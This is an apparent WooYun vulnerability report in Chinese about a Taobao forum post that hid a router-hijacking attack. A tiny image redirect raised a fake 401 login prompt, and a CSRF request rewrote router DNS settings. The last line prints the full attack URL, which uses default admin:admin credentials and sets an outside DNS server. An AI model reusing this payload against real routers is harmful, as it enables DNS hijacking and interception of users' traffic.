双十一,大家都在张灯结彩,准备大展身手进行抢货的时候,在淘宝论坛上,却出现了劫持路由器的恶意代码…基础认证,真假难辨。
WooYun缺陷编号:WooYun-2013-42571
乌云白帽子 zsmynl 提交于 2013-11-11
漏洞重现:
首先地址是这个:http://bbs.taobao.com/catalog/thread/508895-264831340.htm
是淘宝没错吧,打开后发现了个401基础认证的密码输入框。
分析网页源码,果然又看到了传说中的“路由CSRF”攻击代码
往上追一追,来自一张极小的图片,这个图片直接给用户返回302跳转
在看下这人帖子中这张诡异的“图片”
漏洞点评:
这次攻击者才用的是401基础认证钓鱼(诱骗浏览者自己输入路由器帐号密码)。不管是新闻源也好,还是论坛也好,一个不留神,路由器就被别人劫持了。因此相对于厂商需要重视自家网站的同时,网民们更需要提升自己的安全意识。在需要输入敏感信息的区域一定要更加慎重与小心。
PS:上面修改路由器DNS的代码是:http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=192.168.1.1&domain=&dnsserver=58.215.176.9&dnsserver2=192.168.1.1&Save=%B1%A3%B4%E6